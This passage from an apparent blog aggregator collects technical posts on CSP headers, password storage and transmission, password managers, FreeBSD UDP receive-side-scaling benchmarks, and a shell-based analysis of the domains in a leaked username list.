CSP tries to fix this in a much more generic way: How can we prevent XSS from happening at all? The way to do this is that the web server is sending a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large re-engineering of existing code. Preferrably CSP should be part of the development process right from the beginning. If you start a web project keep that in mind and educate your developers to use restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.

To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS free because it doesn't use any untrusted input, I mainly wanted to have an easy target to do some testing. I also tried to add CSP to this blog, but this turned out to be much more complicated.

For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");

The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.

This is an extremely simple CSP policy. To give you an idea how a more realistic policy looks like this is the one from Github:
Content-Security-Policy: default-src *; script-src assets-cdn.github.com www.google-analytics.com collector-cdn.github.com; object-src assets-cdn.github.com; style-src 'self' 'unsafe-inline' 'unsafe-eval' assets-cdn.github.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.githubusercontent.com *.gravatar.com *.wp.com; media-src 'none'; frame-src 'self' render.githubusercontent.com gist.github.com www.youtube.com player.vimeo.com checkout.paypal.com; font-src assets-cdn.github.com; connect-src 'self' ghconduit.com:25035 live.github.com uploads.github.com s3.amazonaws.com

Reporting feature

You may have noticed in my CSP header line that there's a "report-uri" command at the end. The idea is that whenever a browser blocks something by CSP it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support (I'm looking at you Internet Explorer) and we want to know if our policy breaks anything that is supposed to work. The way this works is that a json file with details is sent via a POST request to the URL given.

While this sounds really neat in theory, in practise I found it to be quite disappointing. As I said above I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However I get lots of them and they are all false positives. The problem are browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that a combination of HTTPS everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this and if this is something that should be reported as a bug either to the browser vendors or the extension developers.

Conclusion

If you start a web project use CSP. If you have a web page that needs extra security use CSP (my bank doesn't - does yours?). CSP reporting is neat, but it's usefulness is limited due to too many false positives.

Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example for a simliar technology are prepared statements for SQL. If you use them you won't have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.

Buffer overflows where first documented 1972 and they still are the source of many security issues. Fixing them for good is trickier but it is also possible.

Password security in network applications

by Michał Górny via Michał Górny »

While we have many interesting modern authentication methods, password authentication is still the most popular choice for network applications. It’s simple, it doesn’t require any special hardware, it doesn’t discriminate anyone in particular. It just works™.

The key requirement for maintaining security of a secret-based authentication mechanism is the secrecy of the secret (password). Therefore, it is very important for the designer of network applications regard the safety of password as essential and do their best to protect it.

In particular, the developer can affect the security of password
in three manners:

  1. through the security of server-side key storage,
  2. through the security of the secret transmission,
  3. through encouraging user to follow the best practices.
I will expand on each of them in order.



Security of server-side key storage

For the secret-based authentication to work, the server needs to store some kind of secret-related information. Commonly, it stores the complete user password in a database. Since it can be a valuable information, it should be especially protected so that even in case of unauthorized access to the system the attacker can not obtain it easily.

This could be achieved through use of key derivation functions, for example. In this case, a derived key is computed from user-provided password and used in the system. With a good design, the password could actually never leave client’s computer — it can be converted straight to the derived key there, and the derived key may be used from this point forward. Therefore, the best than an attacker could get is the derived key with no trivial way of obtaining the original secret.

Another interesting possibility is restricting access to the password store. In this case, the user account used to run the application does not have read or write access to the secret database. Instead, a proxy service is used that provides necessary primitives such as:

  • authenticating the user,
  • changing user’s password,
  • and allowing user’s password reset.
It is crucial that none of those primitives can be used without proving necessary user authorization. The service must provide no means to obtain the current password, or to set a new password without proving user authorization. For example, a password reset would have to be confirmed using authentication token that is sent to user’s e-mail address (note that the e-mail address must be securely stored too) directly by the password service — that is, omitting the potentially compromised application.

Examples of such services are PAM and LDAP. In both cases, only the appropriately privileged system or network administrator has access to the password store, while every user can access the common authentication and password setting functions. In case a bug in the application serves as a backdoor to the system, the attacker does not have sufficient privileges to read the passwords.

Security of secret transmission

The authentication process and other functions involving transmitting secrets over network are the most security-concerning processes in the password’s lifetime.

I think this topic has been satisfactorily described multiple times, so I will just summarize the key points shortly:

  1. Always use secured (TLS) connection both for authentication and post-authentication operations. This has multiple advantages, including protection against eavesdropping, message tampering, replay and man-in-the-middle attacks.
  2. Use sessions to avoid having to re-authenticate on every request. However, re-authentication may be desired when accessing data crucial to security — changing e-mail address, for example.
  3. Protect the secrets as early as possible. For example, if derived key is used for authentication, prefer deriving it client-side before the request is sent. In case of webapps, this could be done using ECMAScript, for example.
  4. Use secure authentication methods if possible. For example, you can use challenge-response authentication to avoid transmitting the secret at all.
  5. Provide alternate authentication methods to reduce the use of the secret. Asymmetric key methods (such as client certificates or SSH pre-authentication) are both convenient and secure. Alternative one-time passwords can benefit the use of application on public terminals that can’t be trusted being secure from keylogging.
  6. Support two-factor authentication if possible. For example, you can supplement password authentication with TOTP. Preferably, you may use the same TOTP parameters as Google Authenticator uses, effectively enabling your users to use multiple applications designed to serve that purpose.
  7. And most importantly, never ever send user’s password back to him or show it to him. For preventing mistakes, ask user to type the password twice. For providing password recovery, generate and send pseudorandom authorization token, and ask the user to set a new password after using it.

Best practices for user management of passwords

Server-side key storage and authentication secured, the only potential weakness left is the user’s system. While the application administrator can’t — or often shouldn’t — control it, he should encourage user to use best practices for password security.

Those practices include:

  1. Using a secure, hard-to-guess password. Including a properly working password strength meter and a few tips is a good way of encouraging this. However, as explained below, weak password should merely issue a warning rather than a fatal error.
  2. Using different passwords for separate applications to reduce the damage resulting from an attack resulting in obtaining the secret.
  3. If the user can’t memorize the password, using a dedicated, encrypted key store or a secure password derivation method. Examples of the former include built-in browser and system-wide password stores, and also dedicated applications such as KeePass. Example of the latter is Entropass that uses a user-provided master password and salt constructed from the site’s domain.
  4. Using the password only in response to properly authenticated requests. In particular, the application should have a clear policy when the password can be requested and how the authenticity of the application can be verified.
A key point is that all the good practices should be encouraged, and the developer should never attempt to force them. If there should be any limitations on allowed passwords, they should be rather technical and rather flexible.

If there should be a minimum length for a password, it should only focus on withstanding the first round of a brute force attack. Technically saying, any limitation actually reduces entropy since the attacker can safely omit short passwords. However, with the number of possibilities growing incrementally this doesn’t even matter.

Similarly, requiring the password to contain characters from a specific set is a bad idea. While it may sound good at first, it is yet another way of reducing entropy and making the passwords more predictable. Think of the sites that require the password to contain at least one digit. How many users have passwords ending with the digit one (1), or maybe their birth year?

The worst case are the sites that do not support setting your own password, and instead force you to use a password generated using some kind of pseudo-random algorithm. Simply said, this is an open invitation to write the password down. And once written down in cleartext, the password is no longer a secret.

Setting low upper limits on passwords is not a good idea either. It is reasonable to set some technical limitations, say, 255 bytes of ASCII printable characters. However, setting the limit much lower may actually reduce the strength of some of user passwords and collide with some of the derived keys.

Lastly, the service should clearly state when it may ask for user’s password and how to check the authenticity of the request. This can involve generic instructions involving TLS certificate and domain name checks. It may also include site-specific measures like user-specific images on login form.

Having a transparent security-related announcements policy and information page is a good idea as well. If a site provides more than one service (e.g. e-mail accounts), the website can list certificate fingerprints for the other services. Furthermore, any certificate or IP address changes can be preceded by a GPG-signed mail announcement.

phpMyFAQ 2.8.13 Released!

by Thorsten via phpMyFAQ devBlog »

The phpMyFAQ Team would like to announce the availability of phpMyFAQ 2.8.13, the “Joachim Fuchsberger” release. This release fixes multiple security vulnerabilities, all users of affected phpMyFAQ versions are encouraged to upgrade as soon as possible to this latest versions! A detailed security advisory is available. We also added SQLite3 support, backported from phpMyFAQ 2.9. […]

My thoughts on the Self-Hosting Solution

by Flameeyes via Flameeyes's Weblog »

You probably noticed that in the (frequent) posts talking about security and passwords lately, I keep suggesting LastPass as a password manager. This is the manager that I use myself, and the reason why I came to this one is multi-faceted, but essentially I'm suggesting you use a tool that does not make it more inconvenient to maintain proper password hygiene. Because yes, you should be using different passwords, with a combination of letters, numbers and symbols, but if you have to come up with a new one every time, then things are going to be difficult and you'll just decide to use the same password over and over.

Or you'll use a method for having "unique" passwords that are actually comprised of a fixed part and a mobile one (which is what I used for the longest time). And let's be clear, using the same base password suffixed with the name of the site you're signing up for is not a protection at all, the moment more than one of your passwords is discovered.

So convenience being important, because inconvenience just leads to bad security hygiene, LastPass delivers on what I need: it has autofill, so I don't have to open a terminal and run sgeps (like I used to be) to get the password out of the store, it generates the password in the browser, so I don't have to open a terminal and run pwgen, it runs on my cellphone, so I can use it to fetch the password to type somewhere else, and it even auto-fills my passwords in the Android apps, so I don't have to use a simple password when dealing with some random website that then patches to an app on my phone. But it also has a few good "security conveniences": you can re-encode your Vault on a new master password, you can use a proper OTP pad or a 2FA device to protect it further, and they have some extras such as letting you know if the email you use across services are involved in an account breach.

This does not mean there are no other good password management tools, I know the name of plenty, but I just looked for one that had the features I cared about, and I went with it. I'm happy with LastPass right now. Yes, I need to trust the company and their code a fair bit, but I don't think that just being open source would gain me more trust. Being open source and audited for a long time, sure, but I don't think either way it's a dealbreaker for me. I mean Chrome itself has a password manager, it just feels not suitable for me (no generation, no obvious way to inspect the data from mobile, sometimes bad collation of URLs, and as far as I know no way to change the sync encryption password). It also requires me to have access to my Google account to get that data.

But the interesting part is how geeks will quickly suggest to just roll your own, be it using some open-source password manager, requiring an external sync system (I did that for sgeps, but it's tied to a single GPG key, so it's not easy for me having two different hardware smartcards), or even your own sync infrastructure. And this is what I really can't stand as an answer, because it solves absolutely nothing. Jürgen called it cynical last year, but I think it's even worse than that, it's hypocritical.

Roll-your-own or host-your-own are, first of all, not going to be options for the people who have no intention to learn how computer systems work — and I can't blame them, I don't want to know how my fridge or dishwasher work, I just want them working. People don't care to learn that you can get file A on computer B, but then if you change it on both while offline you'll have collisions, so now you lost one of the two changes. They either have no time, or just no interest or (but I don't think that happens often) no skill to understand that. And it's not just the random young adult that ends up registering on xtube because they have no idea what it means. Jeremy Clarkson had to learn the hard way what it means to publish your bank details to the world.

But I think it's more important to think of the amount of people who think that they have the skills and the time, and then are found lacking one or both of them. Who do you think can protect your content (and passwords) better? A big company with entire teams dedicated to security, or an average 16 years old guy who think he can run the website's forum? — The reference here is to myself: back in 2000/2001 I used to be the forum admin for an Italian gaming community. We got hacked, multiple times, and every time it was for me a new discovery of what security is. At the time third-party forum hosting was reserved to paying customers, and the results have probably been terrible. My personal admin password matched one of my email addresses up until last week and I know for a fact that at least one group of people got access to the password database, where they were stored in plain text.

Yes it is true, targets such as Adobe will lead to many more valid email addresses and password hashes than your average forum, but as the "fake" 5M accounts should have shown you, targeting enough small fishes can lead to just about the same results, if not even better, as you may be lucky and stumble across two passwords for the same account, which allows you to overcome the above-mentioned similar-but-different passwords strategy. Indeed, as I noted in my previous post, Comic Book Database admitted to be the source of part of that dump, and it lists at least four thousand public users (contributors). Other sites such as MythTV Talk or PoliceAuctions.com, both also involved, have no such statement ether.

This is not just a matter of the security of the code itself, so the "many eyes" answer does not apply. It is very well possible to have a screw up with an open source program as well, if it's misconfigured, or if a vulnerable version don't get updated in time because the admin just has no time. You see that all the time with WordPress and its security issues. Indeed, the reason why I don't migrate my blog to WordPress is that I won't ever have enough time for it.

I have seen people, geeks and non-geeks both, taking the easy way out too many times, blaming Apple for the nude celebrity pictures or Google for the five million accounts. It's a safe story: "the big guys don't know better", "you just should keep it off the Internet", "you should run your own!" At the end of the day, both turned out to be collections, assembled from many small cuts, either targeted or not, in part due to people's bad password hygiene (or operational security if you prefer a more geek term), and in part due to the fact that nothing is perfect.

FreeBSD 10.1-BETA1 Available

by Webmaster Team via FreeBSD News Flash »

The first BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

Make password management better

by Flameeyes via Flameeyes's Weblog »

When I posted my previous post on accounts on Google+ I received a very interesting suggestions that I would like to bring to the attention of more people. Andrew Cooks pointed out that what LastPass (and other password managers) really need, is a way to specify the password policy programmatically, rather than crowdsourcing this data as LastPass is doing right now.

There are already a number of cross-product specifications of fixed-path files used to describe parameters such as robots.txt or sitemap.xml. While cleaning up my blog's image serving I also found that there is a rules.abe file used by the NoScript extension for Firefox. In this optic, adding a new password-policy.txt file to define some parameters for the password policy of the website.

Things like the minimum and maximum length of the password, which characters are allowed, whether it is case sensitive or not. These are important information that all the password managers need to know, and as I said not all websites make it clear to the user either. I'll recount two different horror stories, one in the past and one more recent, that show how that is important.

The first story is from probably almost ten years ago or so. I registered with the Italian postal service. I selected a "strong" (not really) password, 11 characters long. It was not really dictionary-based, but it was close enough if you knew my passwords' pattern. Anyway, I liked the idea of having the long password. I signed up for it, I logged back in, everything worked. Until a few months later, when I decided I wanted to fetch that particular mailbox from GMail — yes, the Italian postal service gives you an email box, no I don't want to comment further on that.

What happens is that the moment I tried to set up the mail fetching on GMail, it kept failing authentication. And I'm sure I used the right password that I've insisted using up to that point! I log in on the website just fine with it, so what gives? A quick check at the password that my browser (I think Firefox at the time) think is the password of that website shows me the truth: the password I've been using to log in does not match the one I tried to use from GMail: the last character is not there. Some further inspection of the postal service website shows that the password fields, both in the password change and login (and I assumed at the time the registration page for obvious reasons), set a maxlength value to 10. So of course, as long as I typed or pasted the password in the field, the way I typed it when I registered, it worked perfectly fine, but when I tried to login out of band (through POP3) it used the password as I intended, and failed.

A similar, more recent story happened with LastMinute. I went to change my password, in my recent spree of updating all my passwords, even for accounts not in use (mostly to make sure that they don't get leaked and allow people to do crazy stuff to me). My default password generator on LastPass is set to generate 32-characters passwords. But that did not work for LastMinute, or rather, it appeared to. It let me change my password just fine, but when I tried logging back in, well, it did not work. Yes, this is the reason that I try to log back in after generating the password, I've seen that happening before. In this case, the problem was to be found in the length of the password.

But just having a proper range for the password length wouldn't be enough. Other details that would be useful are for instance the allowed symbols; I have found that sometimes I need to either generate a number of passwords to find one that does not have one of the disallowed symbols but still has some, or give up on the symbols altogether and ask LastPass to generate only letters and numbers. Or having a way to tell that the password is case sensitive or not — because if it is not, what I do is disable the generation of one set of letters, so that it randomises them better.

But there is more metadata that could be of use there — things like which domains should the password be used with, for instance. Right now LastPass has a (limited) predefined list of equivalent domains, and hostnames that need to match exactly (so that bugs.gentoo.org and forums.gentoo.org are given different passwords), while it's up to you to build the rest of the database. Even for the Amazon domains, the list is not comprehensive and I had to add quite a few when logging in the Italian and UK stores.

Of course if you were just to tell that your website uses the same password as, say, google.com, you're going to have a problem. What you need is a reciprocal indication that both sites think the other is equivalent, basically serving the same identical file. This makes the implementation a bit more complex but it should not be too difficult as those kind of sites tend to at least share robots.txt (okay, not in the case of Amazon), so distributing one more file should not be that difficult.

I'm not sure if anybody is going to work on implementing this, or writing a proper specification for it, rather than a vague rant on a blog, but hope can't die, right?

Receive side scaling: testing UDP throughput

by Adrian via Adrian Chadd's Ramblings »

I think it's about time I shared some more details about the RSS stuff going into FreeBSD and how I'm testing it.

For now I'm focusing on IPv4 + UDP on the Intel 10GE NICs. The TCP side of things is done (and the IPv6 side of things works too!) but enough of the performance walls show up in the IPv4 UDP case that it's worth sticking to it for now.

I'm testing on a pair of 4-core boxes at home. They're not special - and they're very specifically not trying to be server-class hardware. I'd like to see where these bottlenecks are even at low core count.

The test setup in question:

Testing software:

  • http://github.com/erikarn/freebsd-rss
  • It requires libevent2 - an updated copy; previous versions of libevent2 didn't handle FreeBSD specific errors gracefully and would early error out of the IO loop.

Server:

  • CPU: Intel(R) Core(TM) i5-3550 CPU @ 3.30GHz (3292.59-MHz K8-class CPU)
  • There's no SMT/HTT, but I've disabled it in the BIOS just to be sure
  • 4GB RAM
  • FreeBSD-HEAD, amd64
  • NIC:  '82599EB 10-Gigabit SFI/SFP+ Network Connection
  • ix0: 10.11.2.1/24
/etc/sysctl.conf:

# for now redirect processing just makes the lock overhead suck even more.
# disable it.
net.inet.ip.redirect=0
net.inet.icmp.drop_redirect=1
/boot/loader.conf:

hw.ix.num_queues=8

# experiment with deferred dispatch for RSS
net.isr.numthreads=4
net.isr.maxthreads=4
net.isr.bindthreads=1
 
kernel config:

include GENERIC
ident HACKBOX

device netmap
options RSS
options PCBGROUP

# in-system lock profiling
options LOCK_PROFILING

# Flowtable - the rtentry locking is a bit .. slow.
options   FLOWTABLE

# This debugging code has too much overhead to do accurate
# testing with.
nooptions         INVARIANTS
nooptions         INVARIANT_SUPPORT
nooptions         WITNESS
nooptions         WITNESS_SKIPSPIN

The server runs the "rss-udp-srv" process, which behaves like a multi-threaded UDP echo server on port 8080.

Client

The client box is slightly more powerful to compensate for (currently) not using completely affinity-aware RSS UDP transmit code.

  • CPU: Intel(R) Core(TM) i5-4460  CPU @ 3.20GHz (3192.68-MHz K8-class CPU)
  • SMT/HTT: Disabled in BIOS
  • 8GB RAM
  • FreeBSD-HEAD amd64
  • Same kernel config, loader and sysctl config as the server
  • ix0: configured as 10.11.2.2/24, 10.11.2.3/32, 10.11.2.4/32, 10.11.2.32/32, 10.11.2.33/32
The client runs 'udp-clt' programs to source and sink traffic to the server.

Running things

The server-side simply runs the listen server, configured to respond to each frame:

$ rss-udp-srv 1 10.11.2.1

The client-side runs four couples of udp-clt, each from different IP addresses. These are run in parallel (i do it in different screens, so I can quickly see what's going on):

$ ./udp-clt -l 10.11.2.3 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.4 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.32 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.33 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510

The IP addresses are chosen so that the 2-tuple topelitz hash using the default Microsoft key hash to different RSS buckets that live on individual CPUs.

Results: Round one

When the server is responding to each frame, the following occurs. The numbers are "number of frames generated by the client (netstat)", "number of frames received by the server (netstat)", "number of frames seen by udp-rss-srv", "number of responses transmitted from udp-rss-srv", "number of frames seen by the server (netstat)"
  • 1 udp-clt process: 710,000; 710,000; 296,000; 283,000; 281,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 592,000; 592,000; 575,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 636,000; 636,000; 600,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 255,000; 255,000; 255,000
So, it's not actually linear past two cores. The question here is: why?

There are a couple of parts to this.

Firstly - I had left turbo boost on. What this translated to:

  • One core active: ~ 30% increase in clock speed
  • Two cores active: ~ 30% increase in clock speed
  • Three cores active: ~ 25% increase in clock speed
  • Four cores active: ~ 15% increase in clock speed.
Secondly and more importantly - I had left flow control enabled. This made a world of difference.

The revised results are mostly linear - with more active RSS buckets (and thus CPUs) things seem to get slightly more efficient:
  • 1 udp-clt process: 710,000; 710,000; 266,000; 266,000; 266,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 512,000; 512,000; 512,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 810,000; 810,000; 810,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 1,120,000; 1,120,000; 1,120,000

Finally, let's repeat the process but only receiving instead also echoing back the packet to the client:

$ rss-udp-srv 0 10.11.2.1
  • 1 udp-clt process: 710,000; 710,000; 204,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 378,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 645,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 900,000
The receive-only workload is actually worse off versus the transmit + receive workload!

What's going on here?

Well, a little digging shows that in both instances - even with a single udp-clt thread running which means only one CPU on the server side is actually active! - there's active lock contention.

Here's an example dtrace output for measuring lock contention with only one active process, where one CPU is involved (and the other three are idle):

Receive only, 5 seconds:

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # dtrace -n 'lockstat:::adaptive-block { @[stack()] = sum(arg1); }'
dtrace: description 'lockstat:::adaptive-block ' matched 1 probe
^C

              kernel`udp_append+0x11c
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
         46729281


Transmit + receive, 5 seconds:

dtrace: description 'lockstat:::adaptive-block ' matched 1 probe
^C

              kernel`knote+0x7e
              kernel`sowakeup+0x65
              kernel`udp_append+0x14a
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
             3793

              kernel`udp_append+0x11c
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
          3823793

              kernel`ixgbe_msix_que+0xd3
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
          9918140

Somehow it seems there's less lock contention / blocking going on when both transmit and receive is running!

So then I dug into it using the lock profiling suite. This is for 5 seconds with receive-only traffic on a single RSS bucket / CPU (all other CPUs are idle):

# sysctl debug.lock.prof.enable = 1; sleep 5 ; sysctl debug.lock.prof.enable=0

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl debug.lock.prof.enable=1 ; sleep 5 ; sysctl debug.lock.prof.enable=0
debug.lock.prof.enable: 1 -> 1

debug.lock.prof.enable: 1 -> 0

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl debug.lock.prof.stats | head -2 ; sysctl debug.lock.prof.stats | sort -nk4 | tail -10
debug.lock.prof.stats: 
     max  wait_max       total  wait_total       count    avg wait_avg cnt_hold cnt_lock name
    1496         0       10900           0          28    389      0  0      0 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2755 (sx:USB config SX lock)
debug.lock.prof.stats: 
       0         0          31           1          67      0      0  0      4 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:888 (spin mutex:sched lock 2)
       0         0        2715           1       49740      0      0  0      7 /usr/home/adrian/work/freebsd/head/src/sys/dev/random/random_harvestq.c:294 (spin mutex:entropy harvest mutex)
       1         0          51           1         131      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:1179 (spin mutex:sched lock 1)
       0         0          69           2         170      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:886 (spin mutex:sched lock 2)
       0         0       40389           2      287649      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/kern_intr.c:1359 (spin mutex:sched lock 2)
       0         2           2           4          12      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2762 (sleep mutex:Giant)
      15        20        6556         520        2254      2      0  0    105 /usr/home/adrian/work/freebsd/head/src/sys/dev/acpica/Osd/OsdSynch.c:535 (spin mutex:ACPI lock (0xfffff80002b10f00))

       4         5      195967       65888     3445501      0      0  0  28975 /usr/home/adrian/work/freebsd/head/src/sys/netinet/udp_usrreq.c:369 (sleep mutex:so_rcv)

Notice the lock contention for the so_rcv (socket receive buffer) handling? What's going on here is pretty amusing - it turns out that because there's so much receive traffic going on, the userland process receiving the data is being preempted by the NIC receive thread very often - and when this happens, there's a good chance it's going to be within the small window that the receive socket buffer lock is held. Once this happens, the NIC receive thread processes frames until it gets to one that requires it to grab the same sock buffer lock that is already held by userland - and it fails - so the NIC thread sleeps until the userland thread finishes consuming a packet. Then the CPU flips back to the NIC thread and continues processing a packet.

When the userland code is also transmitting frames it's increasing the amount of time in between socket receives and decreasing the probability of hitting the lock contention condition above.

Note there's no contention between CPUs here - this is entirely contention within a single CPU.

So for now I'm happy that the UDP IPv4 path is scaling well enough with RSS on a single core. The main performance problem here is the socket receive buffer locking (and, yes, copyin() / copyout().)

Next!

How to analyze a dump of usernames

by Flameeyes via Flameeyes's Weblog »

There has been some noise around a leak of users/passwords pairs which somehow panicked people into thinking it was coming from a particular provider. Since it seems most people have not even tried looking at the account information available, I'd like to point out some ways that could have helped avoiding the panic, if only the reporters cared. It also fits nicely into my previous notes on accounts' churn.

But before proceeding let me make one thing straight: this post contains no information that is not available to the public and bears no relation to my daily work for my employer. Just wanted to make that clear. Edit: for the official response, please see this blog post of Google's Security blog.

To begin the analysis you need a copy of the list of usernames; Italian blogger Paolo Attivissimo linked to it in his post but I'm not going to do so. Especially since it's likely to become obsolete soon, and might not be liked by many. The archive is a compressed list of usernames without passwords or password hashes. At first, it seems to contain almost exclusively gmail.com addresses — in truth there are more addresses but it probably does not hit the news as much to say that there are some 5 million addresses from some thousand domains.

Let's first try to extract real email addresses from the file, which I'll call rawsource.txt — yes it does not match the name of the actual source file out there but I would rather avoid the search requests finding this post from the filename.

$ fgrep @ rawsource.txt > source-addresses.txt
This removes some two thousands lines that were not valid addresses — turns out that the file actually contains some passwords, so let's process it a little more to get a bigger sample of valid addresses:

$ sed -i -e 's:|.*::' source-addresses.txt
This should make the next command give us a better estimate of the content:

$ sed -n -e 's:.*@::p' source-addresses.txt | sort | uniq -c | sort -n
[snip]
  238 gmail.com.au
256 gmail.com.br
338 gmail.com.vn
608 gmail.com777
123215 yandex.ru
4800129 gmail.com
So as we were saying earlier there are more than just Google accounts in this. A good chunk of them are on Yandex, but if you look at the outlier in the list there are plenty of other domains including Yahoo. Let's just filter away the four thousands addresses using either broken domains or outlier domains and instead focus on these three providers:

$ egrep '@(gmail.com|yahoo.com|yandex.ru)$' source-addresses.txt > good-addresses.txt
Now things get more interesting, because to proceed to the next step you have to know how email servers and services work. For these three providers, and many default setups for postfix and similar, the local part of the address (everything before the @ sign) can contain a + sign, when that is found, the local part is split into user and extension, so that mail to nospam+noreally would be sent to the user nospam. Servers generally ignore the extension altogether, but you can use it to either register multiple accounts on the same mailbox (like I do for PayPal, IKEA, Sony, …) or to filter the received mail on different folders. I know some people who think they can absolutely identify the source of spam this way — I'm a bit more skeptical, if I was a spammer I would be dropping the extension altogether. Only some very die-hard Unix fans would not allow inbound email without an extension. Especially since I know plenty of services that don't accept email addresses with + in them.

Since this is not very well known, there are going to be very few email addresses using this feature, but that's still good because it limits the amount of data to crawl through. Finding a pattern within 5M addresses is going to take a while, finding one in 4k is much easier:

$ egrep '.*\+.*@.*' good-addresses.txt | sed -e '/.*@.*@.*/d' > experts-addresses.txt
The second command filters out some false positives due to two addresses being on the same line; the results from the source file I started with is 3964 addresses. Now we're talking. Let's extract the extensions from those good addresses:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort > extensions.txt
The first obvious thing you can do is figure out if there are duplicates. While the single extensions are probably interesting too, finding a pattern is easier if you have people using the same extension, especially since there aren't that many. So let's see which extensions are common:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort | uniq -c -d | sort -n > common-extensions.txt
An obvious quick look look of that shows that a good chunk of the extensions (the last line in the generated file) used were referencing xtube – which you may or may not know as a porn website – reminding me of the YouPorn-related leak two and a half years ago. Scouring through the list of extensions, it's also easy to spot the words "porn" and "porno", and even "nudeceleb" making the list probably quite up to date.

Just looking at the list of extensions shows a few patterns. Things like friendster, comicbookdb (and variants like comics, comicdb, …) and then daz (dazstudio), and mythtv. As RT points out it might very well be phishing attempts, but it is also well possible that some of those smaller sites such as comicbookdb were breached and people just used the same passwords for their GMail address as the services (I used to, too!), which is why I think mandatory registrations are evil.

The final automatic interesting discovery you can make involves checking for full domains in the extensions themselves:

fgrep . extensions.txt | sort -u
This will give you which extensions include a dot in the name, many of which are actually proper site domains: xtube figures again, and so does comicbookdb, friendster, mythtvtalk, dax3d, s2games, policeauctions, itickets and many others.

What does this all tell me? I think what happens is that this list was compiled with breaches of different small websites that wouldn't make a headline (and that most likely did not report to their users!), plus some general phishing. Lots of the passwords that have been confirmed as valid most likely come from people not using different passwords across websites. This breach is fixed like every other before it: stop using the same password across different websites, start using something like LastPass, and use 2 Factor Authentication everywhere is possible.

Unifying PostgreSQL Ebuilds

by titanofold via titanofold »

After an excruciating wait and years of learning PostgreSQL, it’s time to unify the PostgreSQL ebuilds.I’m not sure what the original motivation was to split the ebuilds, but, from the history I’ve seen on Gentoo, it has always been that way. That’s a piss-poor reason for continuing to do things a certain way. Especially when that way is wrong and makes things more tedious and difficult than they ought to be.

